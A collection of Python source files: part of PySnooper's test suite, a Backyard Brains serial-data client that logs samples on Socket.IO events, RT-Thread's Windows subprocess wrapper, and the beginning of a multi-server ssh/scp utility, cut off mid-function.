VariableEntry('foo', value_regex="u?'baba'"),
CallEntry('def my_function(foo):'),
LineEntry('x = 7'),
VariableEntry('x', '7'),
LineEntry('y = 8'),
VariableEntry('y', '8'),
LineEntry('return y + x'),
ReturnEntry('return y + x'),
ReturnValueEntry('15'),
ElapsedTimeEntry(),
VariableEntry('foo', value_regex="u?'baba'"),
CallEntry('def my_function(foo):'),
LineEntry('x = 7'),
VariableEntry('x', '7'),
LineEntry('y = 8'),
VariableEntry('y', '8'),
LineEntry('return y + x'),
ReturnEntry('return y + x'),
ReturnValueEntry('15'),
ElapsedTimeEntry(),
)
)
def test_error_in_overwrite_argument():
with mini_toolbox.create_temp_folder(prefix='pysnooper') as folder:
with pytest.raises(Exception, match='can only be used when writing'):
@pysnooper.snoop(overwrite=True)
def my_function(foo):
x = 7
y = 8
return y + x
def test_needs_parentheses():
assert not needs_parentheses('x')
assert not needs_parentheses('x.y')
assert not needs_parentheses('x.y.z')
assert not needs_parentheses('x.y.z[0]')
assert not needs_parentheses('x.y.z[0]()')
assert not needs_parentheses('x.y.z[0]()(3, 4 * 5)')
assert not needs_parentheses('foo(x)')
assert not needs_parentheses('foo(x+y)')
assert not needs_parentheses('(x+y)')
assert not needs_parentheses('[x+1 for x in ()]')
assert needs_parentheses('x + y')
assert needs_parentheses('x * y')
assert needs_parentheses('x and y')
assert needs_parentheses('x if z else y')
@pytest.mark.parametrize("normalize", (True, False))
def test_with_block(normalize):
# Testing that a single Tracer can handle many mixed uses
snoop = pysnooper.snoop(normalize=normalize)
def foo(x):
if x == 0:
bar1(x)
qux()
return
with snoop:
# There should be line entries for these three lines,
# no line entries for anything else in this function,
# but calls to all bar functions should be traced
foo(x - 1)
bar2(x)
qux()
int(4)
bar3(9)
return x
@snoop
def bar1(_x):
qux()
@snoop
def bar2(_x):
qux()
@snoop
def bar3(_x):
qux()
def qux():
return 9 # not traced, mustn't show up
with mini_toolbox.OutputCapturer(stdout=False,
stderr=True) as output_capturer:
result = foo(2)
assert result == 2
output = output_capturer.string_io.getvalue()
assert_output(
output,
(
# In first with
SourcePathEntry(),
VariableEntry('x', '2'),
VariableEntry('bar1'),
VariableEntry('bar2'),
VariableEntry('bar3'),
VariableEntry('foo'),
VariableEntry('qux'),
VariableEntry('snoop'),
LineEntry('foo(x - 1)'),
# In with in recursive call
VariableEntry('x', '1'),
VariableEntry('bar1'),
VariableEntry('bar2'),
VariableEntry('bar3'),
VariableEntry('foo'),
VariableEntry('qux'),
VariableEntry('snoop'),
LineEntry('foo(x - 1)'),
# Call to bar1 from if block outside with
VariableEntry('_x', '0'),
VariableEntry('qux'),
CallEntry('def bar1(_x):'),
LineEntry('qux()'),
ReturnEntry('qux()'),
ReturnValueEntry('None'),
ElapsedTimeEntry(),
# In with in recursive call
LineEntry('bar2(x)'),
# Call to bar2 from within with
VariableEntry('_x', '1'),
VariableEntry('qux'),
CallEntry('def bar2(_x):'),
LineEntry('qux()'),
ReturnEntry('qux()'),
ReturnValueEntry('None'),
ElapsedTimeEntry(),
# In with in recursive call
LineEntry('qux()'),
ElapsedTimeEntry(),
# Call to bar3 from after with
VariableEntry('_x', '9'),
VariableEntry('qux'),
CallEntry('def bar3(_x):'),
LineEntry('qux()'),
ReturnEntry('qux()'),
ReturnValueEntry('None'),
ElapsedTimeEntry(),
# -- Similar to previous few sections,
# -- but from first call to foo
# In with in first call
LineEntry('bar2(x)'),
# Call to bar2 from within with
VariableEntry('_x', '2'),
VariableEntry('qux'),
CallEntry('def bar2(_x):'),
LineEntry('qux()'),
ReturnEntry('qux()'),
ReturnValueEntry('None'),
ElapsedTimeEntry(),
# In with in first call
LineEntry('qux()'),
ElapsedTimeEntry(),
# Call to bar3 from after with
VariableEntry('_x', '9'),
VariableEntry('qux'),
CallEntry('def bar3(_x):'),
LineEntry('qux()'),
ReturnEntry('qux()'),
ReturnValueEntry('None'),
ElapsedTimeEntry(),
),
normalize=normalize,
)
@pytest.mark.parametrize("normalize", (True, False))
def test_with_block_depth(normalize):
string_io = io.StringIO()
def f4(x4):
result4 = x4 * 2
return result4
def f3(x3):
result3 = f4(x3)
return result3
def f2(x2):
result2 = f3(x2)
return result2
def f1(x1):
str(3)
with pysnooper.snoop(string_io, depth=3, normalize=normalize):
result1 = f2(x1)
return result1
result = f1(10)
assert result == 20
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry(),
VariableEntry(),
VariableEntry(),
VariableEntry(),
LineEntry('result1 = f2(x1)'),
VariableEntry(),
VariableEntry(),
CallEntry('def f2(x2):'),
LineEntry(),
VariableEntry(),
VariableEntry(),
CallEntry('def f3(x3):'),
LineEntry(),
VariableEntry(),
LineEntry(),
ReturnEntry(),
ReturnValueEntry('20'),
VariableEntry(),
LineEntry(),
ReturnEntry(),
ReturnValueEntry('20'),
ElapsedTimeEntry(),
),
normalize=normalize,
)
@pytest.mark.parametrize("normalize", (True, False))
def test_cellvars(normalize):
string_io = io.StringIO()
def f2(a):
def f3(a):
x = 0
x += 1
def f4(a):
y = x
return 42
return f4(a)
return f3(a)
def f1(a):
with pysnooper.snoop(string_io, depth=4, normalize=normalize):
result1 = f2(a)
return result1
result = f1(42)
assert result == 42
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry(),
VariableEntry(),
VariableEntry(),
VariableEntry(),
LineEntry('result1 = f2(a)'),
VariableEntry(),
CallEntry('def f2(a):'),
LineEntry(),
VariableEntry(),
LineEntry(),
VariableEntry("a"),
CallEntry('def f3(a):'),
LineEntry(),
VariableEntry("x"),
LineEntry(),
VariableEntry("x"),
LineEntry(),
VariableEntry(),
LineEntry(),
VariableEntry(),
VariableEntry("x"),
CallEntry('def f4(a):'),
LineEntry(),
VariableEntry(),
LineEntry(),
ReturnEntry(),
ReturnValueEntry(),
ReturnEntry(),
ReturnValueEntry(),
ReturnEntry(),
ReturnValueEntry(),
ElapsedTimeEntry(),
),
normalize=normalize,
)
@pytest.mark.parametrize("normalize", (True, False))
def test_var_order(normalize):
string_io = io.StringIO()
def f(one, two, three, four):
five = None
six = None
seven = None
five, six, seven = 5, 6, 7
with pysnooper.snoop(string_io, depth=2, normalize=normalize):
result = f(1, 2, 3, 4)
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry(),
VariableEntry(),
VariableEntry(),
LineEntry('result = f(1, 2, 3, 4)'),
VariableEntry("one", "1"),
VariableEntry("two", "2"),
VariableEntry("three", "3"),
VariableEntry("four", "4"),
CallEntry('def f(one, two, three, four):'),
LineEntry(),
VariableEntry("five"),
LineEntry(),
VariableEntry("six"),
LineEntry(),
VariableEntry("seven"),
LineEntry(),
VariableEntry("five", "5"),
VariableEntry("six", "6"),
VariableEntry("seven", "7"),
ReturnEntry(),
ReturnValueEntry(),
ElapsedTimeEntry(),
),
normalize=normalize,
)
def test_truncate():
max_length = 20
for i in range(max_length * 2):
string = i * 'a'
truncated = truncate(string, max_length)
if len(string) <= max_length:
assert string == truncated
else:
assert truncated == 'aaaaaaaa...aaaaaaaaa'
assert len(truncated) == max_length
def test_indentation():
from .samples import indentation, recursion
assert_sample_output(indentation)
assert_sample_output(recursion)
def test_exception():
from .samples import exception
assert_sample_output(exception)
def test_generator():
string_io = io.StringIO()
original_tracer = sys.gettrace()
original_tracer_active = lambda: (sys.gettrace() is original_tracer)
@pysnooper.snoop(string_io)
def f(x1):
assert not original_tracer_active()
x2 = (yield x1)
assert not original_tracer_active()
x3 = 'foo'
assert not original_tracer_active()
x4 = (yield 2)
assert not original_tracer_active()
return
assert original_tracer_active()
generator = f(0)
assert original_tracer_active()
first_item = next(generator)
assert original_tracer_active()
assert first_item == 0
second_item = generator.send('blabla')
assert original_tracer_active()
assert second_item == 2
with pytest.raises(StopIteration) as exc_info:
generator.send('looloo')
assert original_tracer_active()
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('x1', '0'),
VariableEntry(),
CallEntry(),
LineEntry(),
VariableEntry(),
VariableEntry(),
LineEntry(),
ReturnEntry(),
ReturnValueEntry('0'),
ElapsedTimeEntry(),
# Pause and resume:
VariableEntry('x1', '0'),
VariableEntry(),
VariableEntry(),
VariableEntry(),
CallEntry(),
VariableEntry('x2', "'blabla'"),
LineEntry(),
LineEntry(),
VariableEntry('x3', "'foo'"),
LineEntry(),
LineEntry(),
ReturnEntry(),
ReturnValueEntry('2'),
ElapsedTimeEntry(),
# Pause and resume:
VariableEntry('x1', '0'),
VariableEntry(),
VariableEntry(),
VariableEntry(),
VariableEntry(),
VariableEntry(),
CallEntry(),
VariableEntry('x4', "'looloo'"),
LineEntry(),
LineEntry(),
ReturnEntry(),
ReturnValueEntry(None),
ElapsedTimeEntry(),
)
)
@pytest.mark.parametrize("normalize", (True, False))
def test_custom_repr(normalize):
string_io = io.StringIO()
def large(l):
return isinstance(l, list) and len(l) > 5
def print_list_size(l):
return 'list(size={})'.format(len(l))
def print_dict(d):
return 'dict(keys={})'.format(sorted(list(d.keys())))
def evil_condition(x):
return large(x) or isinstance(x, dict)
@pysnooper.snoop(string_io, custom_repr=(
(large, print_list_size),
(dict, print_dict),
(evil_condition, lambda x: 'I am evil')),
normalize=normalize,)
def sum_to_x(x):
l = list(range(x))
a = {'1': 1, '2': 2}
return sum(l)
result = sum_to_x(10000)
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('x', '10000'),
CallEntry(),
LineEntry(),
VariableEntry('l', 'list(size=10000)'),
LineEntry(),
VariableEntry('a', "dict(keys=['1', '2'])"),
LineEntry(),
ReturnEntry(),
ReturnValueEntry('49995000'),
ElapsedTimeEntry(),
),
normalize=normalize,
)
@pytest.mark.parametrize("normalize", (True, False))
def test_custom_repr_single(normalize):
string_io = io.StringIO()
@pysnooper.snoop(string_io, custom_repr=(list, lambda l: 'foofoo!'), normalize=normalize)
def sum_to_x(x):
l = list(range(x))
return 7
result = sum_to_x(10000)
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('x', '10000'),
CallEntry(),
LineEntry(),
VariableEntry('l', 'foofoo!'),
LineEntry(),
ReturnEntry(),
ReturnValueEntry('7'),
ElapsedTimeEntry(),
),
normalize=normalize,
)
def test_disable():
string_io = io.StringIO()
def my_function(foo):
x = 7
y = 8
return x + y
with mini_toolbox.TempValueSetter((pysnooper.tracer, 'DISABLED'), True):
tracer = pysnooper.snoop(string_io)
with tracer:
result = my_function('baba')
my_decorated_function = tracer(my_function)
my_decorated_function('booboo')
output = string_io.getvalue()
assert not output
@pytest.mark.parametrize("normalize", (True, False))
def test_class(normalize):
string_io = io.StringIO()
@pysnooper.snoop(string_io, normalize=normalize)
class MyClass(object):
def __init__(self):
self.x = 7
def my_method(self, foo):
y = 8
return y + self.x
instance = MyClass()
result = instance.my_method('baba')
assert result == 15
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('self', value_regex="u?.+MyClass object"),
CallEntry('def __init__(self):'),
LineEntry('self.x = 7'),
ReturnEntry('self.x = 7'),
ReturnValueEntry('None'),
ElapsedTimeEntry(),
VariableEntry('self', value_regex="u?.+MyClass object"),
VariableEntry('foo', value_regex="u?'baba'"),
CallEntry('def my_method(self, foo):'),
LineEntry('y = 8'),
VariableEntry('y', '8'),
LineEntry('return y + self.x'),
ReturnEntry('return y + self.x'),
ReturnValueEntry('15'),
ElapsedTimeEntry(),
),
normalize=normalize,
)
@pytest.mark.parametrize("normalize", (True, False))
def test_class_with_decorated_method(normalize):
string_io = io.StringIO()
def decorator(function):
def wrapper(*args, **kwargs):
result = function(*args, **kwargs)
return result
return wrapper
@pysnooper.snoop(string_io, normalize=normalize)
class MyClass(object):
def __init__(self):
self.x = 7
@decorator
def my_method(self, foo):
y = 8
return y + self.x
instance = MyClass()
result = instance.my_method('baba')
assert result == 15
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('self', value_regex="u?.+MyClass object"),
CallEntry('def __init__(self):'),
LineEntry('self.x = 7'),
ReturnEntry('self.x = 7'),
ReturnValueEntry('None'),
ElapsedTimeEntry(),
VariableEntry('args', value_regex=r"\(<.+>, 'baba'\)"),
VariableEntry('kwargs', value_regex=r"\{\}"),
VariableEntry('function', value_regex="u?.+my_method"),
CallEntry('def wrapper(*args, **kwargs):'),
LineEntry('result = function(*args, **kwargs)'),
VariableEntry('result', '15'),
LineEntry('return result'),
ReturnEntry('return result'),
ReturnValueEntry('15'),
ElapsedTimeEntry(),
),
normalize=normalize,
)
@pytest.mark.parametrize("normalize", (True, False))
def test_class_with_decorated_method_and_snoop_applied_to_method(normalize):
string_io = io.StringIO()
def decorator(function):
def wrapper(*args, **kwargs):
result = function(*args, **kwargs)
return result
return wrapper
@pysnooper.snoop(string_io, normalize=normalize)
class MyClass(object):
def __init__(self):
self.x = 7
@decorator
@pysnooper.snoop(string_io, normalize=normalize)
def my_method(self, foo):
y = 8
return y + self.x
instance = MyClass()
result = instance.my_method('baba')
assert result == 15
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('self', value_regex="u?.*MyClass object"),
CallEntry('def __init__(self):'),
LineEntry('self.x = 7'),
ReturnEntry('self.x = 7'),
ReturnValueEntry('None'),
ElapsedTimeEntry(),
VariableEntry('args', value_regex=r"u?\(<.+>, 'baba'\)"),
VariableEntry('kwargs', value_regex=r"u?\{\}"),
VariableEntry('function', value_regex="u?.*my_method"),
CallEntry('def wrapper(*args, **kwargs):'),
LineEntry('result = function(*args, **kwargs)'),
SourcePathEntry(),
VariableEntry('self', value_regex="u?.*MyClass object"),
VariableEntry('foo', value_regex="u?'baba'"),
CallEntry('def my_method(self, foo):'),
LineEntry('y = 8'),
VariableEntry('y', '8'),
LineEntry('return y + self.x'),
ReturnEntry('return y + self.x'),
ReturnValueEntry('15'),
ElapsedTimeEntry(),
VariableEntry('result', '15'),
LineEntry('return result'),
ReturnEntry('return result'),
ReturnValueEntry('15'),
ElapsedTimeEntry(),
),
normalize=normalize,
)
@pytest.mark.parametrize("normalize", (True, False))
def test_class_with_property(normalize):
string_io = io.StringIO()
@pysnooper.snoop(string_io, normalize=normalize)
class MyClass(object):
def __init__(self):
self._x = 0
def plain_method(self):
pass
@property
def x(self):
self.plain_method()
return self._x
@x.setter
def x(self, value):
self.plain_method()
self._x = value
@x.deleter
def x(self):
self.plain_method()
del self._x
instance = MyClass()
# Do simple property operations, make sure we didn't mess up the normal behavior
result = instance.x
assert result == instance._x
instance.x = 1
assert instance._x == 1
del instance.x
with pytest.raises(AttributeError):
instance._x
# The property methods will not be traced, but their calls to plain_method will be.
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('self', value_regex="u?.*MyClass object"),
CallEntry('def __init__(self):'),
LineEntry('self._x = 0'),
ReturnEntry('self._x = 0'),
ReturnValueEntry('None'),
ElapsedTimeEntry(),
# Called from getter
VariableEntry('self', value_regex="u?.*MyClass object"),
CallEntry('def plain_method(self):'),
LineEntry('pass'),
ReturnEntry('pass'),
ReturnValueEntry('None'),
ElapsedTimeEntry(),
# Called from setter
VariableEntry('self', value_regex="u?.*MyClass object"),
CallEntry('def plain_method(self):'),
LineEntry('pass'),
ReturnEntry('pass'),
ReturnValueEntry('None'),
ElapsedTimeEntry(),
# Called from deleter
VariableEntry('self', value_regex="u?.*MyClass object"),
CallEntry('def plain_method(self):'),
LineEntry('pass'),
ReturnEntry('pass'),
ReturnValueEntry('None'),
ElapsedTimeEntry(),
),
normalize=normalize,
)
@pytest.mark.parametrize("normalize", (True, False))
def test_snooping_on_class_does_not_cause_base_class_to_be_snooped(normalize):
string_io = io.StringIO()
class UnsnoopedBaseClass(object):
def __init__(self):
self.method_on_base_class_was_called = False
def method_on_base_class(self):
self.method_on_base_class_was_called = True
@pysnooper.snoop(string_io, normalize=normalize)
class MyClass(UnsnoopedBaseClass):
def method_on_child_class(self):
self.method_on_base_class()
instance = MyClass()
assert not instance.method_on_base_class_was_called
instance.method_on_child_class()
assert instance.method_on_base_class_was_called
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry(),
VariableEntry('self', value_regex="u?.*MyClass object"),
CallEntry('def method_on_child_class(self):'),
LineEntry('self.method_on_base_class()'),
ReturnEntry('self.method_on_base_class()'),
ReturnValueEntry('None'),
ElapsedTimeEntry(),
),
normalize=normalize,
)
def test_normalize():
string_io = io.StringIO()
class A:
def __init__(self, a):
self.a = a
@pysnooper.snoop(string_io, normalize=True)
def add():
a = A(19)
b = A(22)
res = a.a + b.a
return res
add()
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry('test_pysnooper.py'),
VariableEntry('A', value_regex=r"<class .*\.A.?>"),
CallEntry('def add():'),
LineEntry('a = A(19)'),
VariableEntry('a', value_regex=r"<.*\.A (?:object|instance)>"),
LineEntry('b = A(22)'),
VariableEntry('b', value_regex=r"<.*\.A (?:object|instance)>"),
LineEntry('res = a.a + b.a'),
VariableEntry('res', value="41"),
LineEntry('return res'),
ReturnEntry('return res'),
ReturnValueEntry('41'),
ElapsedTimeEntry(),
)
)
def test_normalize_prefix():
string_io = io.StringIO()
_prefix = 'ZZZZ'
class A:
def __init__(self, a):
self.a = a
@pysnooper.snoop(string_io, normalize=True, prefix=_prefix)
def add():
a = A(19)
b = A(22)
res = a.a + b.a
return res
add()
output = string_io.getvalue()
assert_output(
output,
(
SourcePathEntry('test_pysnooper.py', prefix=_prefix),
VariableEntry('A', value_regex=r"<class .*\.A.?>", prefix=_prefix),
CallEntry('def add():', prefix=_prefix),
LineEntry('a = A(19)', prefix=_prefix),
VariableEntry('a', value_regex=r"<.*\.A (?:object|instance)>", prefix=_prefix),
LineEntry('b = A(22)', prefix=_prefix),
VariableEntry('b', value_regex=r"<.*\.A (?:object|instance)>", prefix=_prefix),
LineEntry('res = a.a + b.a', prefix=_prefix),
VariableEntry('res', value="41", prefix=_prefix),
LineEntry('return res', prefix=_prefix),
ReturnEntry('return res', prefix=_prefix),
ReturnValueEntry('41', prefix=_prefix),
ElapsedTimeEntry(prefix=_prefix),
)
)
def test_normalize_thread_info():
string_io = io.StringIO()
class A:
def __init__(self, a):
self.a = a
@pysnooper.snoop(string_io, normalize=True, thread_info=True)
def add():
a = A(19)
b = A(22)
res = a.a + b.a
return res
with pytest.raises(NotImplementedError):
add()
|
spikerClient.py
|
# Backyard Brains Sep. 2019
# Made for python 3
# First install serial library
# Install numpy, pyserial, matplotlib
# pip3 install pyserial
#
# Code will read, parse and display data from BackyardBrains' serial devices
#
# Written by Stanislav Mircic
# [email protected]
import threading
import serial
import time
import matplotlib.pyplot as plt
import numpy as np
from datetime import datetime
import socketio
global connected
connected = False
#change name of the port here
#port = 'COM4'
#port = '/dev/ttyUSB0'
port = '/dev/cu.usbserial-DO015D1O'
baud = 230400
global input_buffer
global sample_buffer
global dataframe
global cBufTail
cBufTail = 0
input_buffer = []
#sample_rate = 10000
#display_size = 30000 #3 seconds
sample_rate = 200
display_size = 600
sample_buffer = np.linspace(0,0,display_size)
serial_port = serial.Serial(port, baud, timeout=0)
last_time_recorded = 0
dataframe = np.array([0,0])
# Code updated with SocketIO
# First install SocketIO
# Written by Rodrigo Sanz Sep. 2020
# [email protected]
sio = socketio.Client()
num = 0
@sio.event
def connect():
print('connection established')
sio.emit('my event', {'data': 'Emit Test Event from here'})
@sio.event
def my_message(data):
global num
global dataframe
global last_time_recorded
print('message received with ', data)
if data == "START SESSION":
print("Reset Variables")
last_time_recorded = 0
dataframe = np.array([0,0])
if data == "END SESSION":
print("Saving CSV")
num = num + 1
strTemp = 'modulo' + str(num) + '.csv'
np.savetxt(strTemp, dataframe, delimiter=',', header='time,data')
sio.emit('my response', {'response': 'my response'})
@sio.event
def disconnect():
print('disconnected from server')
# End Code updated with SocketIO
# Original Code
def checkIfNextByteExist():
global cBufTail
global input_buffer
tempTail = cBufTail + 1
if tempTail==len(input_buffer):
return False
return True
def checkIfHaveWholeFrame():
global cBufTail
global input_buffer
tempTail = cBufTail + 1
while tempTail!=len(input_buffer):
nextByte = input_buffer[tempTail] & 0xFF
if nextByte > 127:
return True
tempTail = tempTail +1
return False;
def areWeAtTheEndOfFrame():
global cBufTail
global input_buffer
tempTail = cBufTail + 1
nextByte = input_buffer[tempTail] & 0xFF
if nextByte > 127:
return True
return False
def numberOfChannels():
return 1
def handle_data(data):
global input_buffer
global cBufTail
global sample_buffer
global dataframe
global last_time_recorded
if len(data)>0:
cBufTail = 0
haveData = True
weAlreadyProcessedBeginingOfTheFrame = False
numberOfParsedChannels = 0
while haveData:
MSB = input_buffer[cBufTail] & 0xFF
if(MSB > 127):
weAlreadyProcessedBeginingOfTheFrame = False
numberOfParsedChannels = 0
if checkIfHaveWholeFrame():
while True:
MSB = input_buffer[cBufTail] & 0xFF
if(weAlreadyProcessedBeginingOfTheFrame and (MSB>127)):
#we have begining of the frame inside frame
#something is wrong
break #continue as if we have new frame
MSB = input_buffer[cBufTail] & 0x7F
weAlreadyProcessedBeginingOfTheFrame = True
cBufTail = cBufTail +1
LSB = input_buffer[cBufTail] & 0xFF
if LSB>127:
break #continue as if we have new frame
LSB = input_buffer[cBufTail] & 0x7F
MSB = MSB<<7
writeInteger = LSB | MSB
numberOfParsedChannels = numberOfParsedChannels+1
if numberOfParsedChannels>numberOfChannels():
#we have more data in frame than we need
#something is wrong with this frame
break #continue as if we have new frame
this_sample = writeInteger-512
sample_buffer = np.append(sample_buffer, this_sample)
time_now = datetime.now().timestamp()
time_elapsed = float("{:.6f}".format(time_now-time_start))
if (time_elapsed > last_time_recorded + 0.002):
dataframe = np.vstack((dataframe, [time_elapsed, this_sample]))
last_time_recorded = time_elapsed
#print("print")
#dataframe = np.vstack((dataframe, [time_elapsed, this_sample]))
#print(dataframe)
if areWeAtTheEndOfFrame():
break
else:
cBufTail = cBufTail +1
else:
haveData = False
break
if(not haveData):
break
cBufTail = cBufTail +1
if cBufTail==len(input_buffer):
haveData = False
break
def read_from_port(ser):
global connected
global input_buffer
while not connected:
#serin = ser.read()
connected = True
while True:
reading = ser.read(1024)
if(len(reading)>0):
reading = list(reading)
#here we overwrite if we left some parts of the frame from previous processing
#should be changed
input_buffer = reading.copy()
#print("len(reading)",len(reading))
handle_data(reading)
time.sleep(0.005)
thread = threading.Thread(target=read_from_port, args=(serial_port,))
time_start = datetime.now().timestamp()
thread.start()
xi = np.linspace(-display_size/sample_rate, 0, num=display_size)
#Plot values with matplotlib
""" while True:
plt.ion()
plt.show(block=False)
if(len(sample_buffer)>0):
#i = len(sample_buffer)
#print(len(sample_buffer))
yi = sample_buffer.copy()
yi = yi[-display_size:]
#sample_buffer = sample_buffer[-display_size:]
#print(sample_buffer)
plt.clf()
plt.ylim(-550, 550)
plt.plot(xi, yi, linewidth=1, color='royalblue')
plt.pause(0.001)
time.sleep(0.08)
"""
sio.connect('http://localhost:5000')
#io.wait()
|
win32spawn.py
|
#
# File : win32spawn.py
# This file is part of RT-Thread RTOS
# COPYRIGHT (C) 2006 - 2015, RT-Thread Development Team
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Change Logs:
# Date Author Notes
# 2015-01-20 Bernard Add copyright information
#
import os
import threading
import sys
_PY2 = sys.version_info[0] < 3
if _PY2:
import Queue
else:
import queue as Queue
# Windows import
import win32file
import win32pipe
import win32api
import win32con
import win32security
import win32process
import win32event
class Win32Spawn(object):
def __init__(self, cmd, shell=False):
self.queue = Queue.Queue()
self.is_terminated = False
self.wake_up_event = win32event.CreateEvent(None, 0, 0, None)
exec_dir = os.getcwd()
comspec = os.environ.get("COMSPEC", "cmd.exe")
cmd = comspec + ' /c ' + cmd
win32event.ResetEvent(self.wake_up_event)
currproc = win32api.GetCurrentProcess()
sa = win32security.SECURITY_ATTRIBUTES()
sa.bInheritHandle = 1
child_stdout_rd, child_stdout_wr = win32pipe.CreatePipe(sa, 0)
child_stdout_rd_dup = win32api.DuplicateHandle(currproc, child_stdout_rd, currproc, 0, 0, win32con.DUPLICATE_SAME_ACCESS)
win32file.CloseHandle(child_stdout_rd)
child_stderr_rd, child_stderr_wr = win32pipe.CreatePipe(sa, 0)
child_stderr_rd_dup = win32api.DuplicateHandle(currproc, child_stderr_rd, currproc, 0, 0, win32con.DUPLICATE_SAME_ACCESS)
win32file.CloseHandle(child_stderr_rd)
child_stdin_rd, child_stdin_wr = win32pipe.CreatePipe(sa, 0)
child_stdin_wr_dup = win32api.DuplicateHandle(currproc, child_stdin_wr, currproc, 0, 0, win32con.DUPLICATE_SAME_ACCESS)
win32file.CloseHandle(child_stdin_wr)
startup_info = win32process.STARTUPINFO()
startup_info.hStdInput = child_stdin_rd
startup_info.hStdOutput = child_stdout_wr
startup_info.hStdError = child_stderr_wr
startup_info.dwFlags = win32process.STARTF_USESTDHANDLES
cr_flags = 0
cr_flags = win32process.CREATE_NEW_PROCESS_GROUP
env = os.environ.copy()
self.h_process, h_thread, dw_pid, dw_tid = win32process.CreateProcess(None, cmd, None, None, 1,
cr_flags, env, os.path.abspath(exec_dir),
startup_info)
win32api.CloseHandle(h_thread)
win32file.CloseHandle(child_stdin_rd)
win32file.CloseHandle(child_stdout_wr)
win32file.CloseHandle(child_stderr_wr)
self.__child_stdout = child_stdout_rd_dup
self.__child_stderr = child_stderr_rd_dup
self.__child_stdin = child_stdin_wr_dup
self.exit_code = -1
def close(self):
win32file.CloseHandle(self.__child_stdout)
win32file.CloseHandle(self.__child_stderr)
win32file.CloseHandle(self.__child_stdin)
win32api.CloseHandle(self.h_process)
win32api.CloseHandle(self.wake_up_event)
def kill_subprocess():
win32event.SetEvent(self.wake_up_event)
def sleep(secs):
win32event.ResetEvent(self.wake_up_event)
timeout = int(1000 * secs)
val = win32event.WaitForSingleObject(self.wake_up_event, timeout)
if val == win32event.WAIT_TIMEOUT:
return True
else:
# The wake_up_event must have been signalled
return False
def get(self, block=True, timeout=None):
return self.queue.get(block=block, timeout=timeout)
def qsize(self):
return self.queue.qsize()
def __wait_for_child(self):
# kick off threads to read from stdout and stderr of the child process
threading.Thread(target=self.__do_read, args=(self.__child_stdout, )).start()
threading.Thread(target=self.__do_read, args=(self.__child_stderr, )).start()
while True:
# block waiting for the process to finish or the interrupt to happen
handles = (self.wake_up_event, self.h_process)
val = win32event.WaitForMultipleObjects(handles, 0, win32event.INFINITE)
if val >= win32event.WAIT_OBJECT_0 and val < win32event.WAIT_OBJECT_0 + len(handles):
handle = handles[val - win32event.WAIT_OBJECT_0]
if handle == self.wake_up_event:
win32api.TerminateProcess(self.h_process, 1)
win32event.ResetEvent(self.wake_up_event)
return False
elif handle == self.h_process:
# the process has ended naturally
return True
else:
assert False, "Unknown handle fired"
else:
assert False, "Unexpected return from WaitForMultipleObjects"
# Wait for job to finish. Since this method blocks, it can to be called from another thread.
# If the application wants to kill the process, it should call kill_subprocess().
def wait(self):
if not self.__wait_for_child():
# it's been killed
result = False
else:
# normal termination
self.exit_code = win32process.GetExitCodeProcess(self.h_process)
result = self.exit_code == 0
self.close()
self.is_terminated = True
return result
# This method gets called on a worker thread to read from either a stderr
# or stdout thread from the child process.
def __do_read(self, handle):
bytesToRead = 1024
while 1:
try:
finished = 0
hr, data = win32file.ReadFile(handle, bytesToRead, None)
if data:
self.queue.put_nowait(data)
except win32api.error:
finished = 1
if finished:
return
def start_pipe(self):
def worker(pipe):
return pipe.wait()
thrd = threading.Thread(target=worker, args=(self, ))
thrd.start()
|
ssh.py
|
#!/usr/bin/env python2
import sys
import os
from subprocess import Popen, PIPE
import Queue
import threading
import re
import datetime
class Ssh:
'''This class can access multiple servers via ssh and scp(both direction)'''
def __init__(self):
'''Run all methods, which will collect all data for threading'''
self.args = dict()
self._get_args()
self.test = int(self.args.get('test', 0))
self.script_config_file = './ssh.py_config'
self._get_args()
self._parse_ssh_py_config()
self._parse_hosts_config()
self._determine_mode()
if self.test:
for serv in self.servers:
command = self._ssh_make_cmd(serv)
print serv, command
sys.exit()
self._pepare_threading()
def _parse_ssh_py_config(self):
'''Parse ssh.py config'''
data = dict()
pat = re.compile(r'([0-9a-zA-Z\_\-\s]+)=(.*)')
if not os.path.isfile(self.script_config_file):
if self.debug:
print('No config file')
return
with open(self.script_config_file) as conf:
for line in conf:
if line.startswith('#'):
continue
parsed = pat.search(line)
if parsed:
key = parsed.group(1).strip()
val = parsed.group(2).strip()
data[key] = val
for key in data:
if key not in self.args:
self.args[key] = data[key]
if self.debug:
print('args from config', data)
print('args from config + cmd', self.args)
def _get_args(self):
'''Parse args'''
data = dict()
for (num,arg) in enumerate(sys.argv[1:], start=1):
tmp_arg = arg.split('=')
if len(tmp_arg) == 2:
key = tmp_arg[0]
val = tmp_arg[1]
else:
key = 'arg' + str(num)
val = arg
data[key] = val
self.args[key] = val
self.debug = int(self.args.get('debug', 0))
if self.debug:
print('args from cmd', data)
def _parse_hosts_config(self):
'''Parse ansible config'''
servers_lists = self.servers_lists = dict()
inventory_file = self.args.get('config', './hosts')
config = open(inventory_file)
for line in config:
line = line.strip().split(' ')[0]
if line.startswith('#'):
continue
if line:
if line.startswith('['):
group = self.group = line[1:-1]
servers_lists[group] = set()
continue
else:
sl = line.split(']')
if len(sl) == 1:
servers_lists[group].add(line)
continue
elif not all(sl):
res = sl[0].split('[')
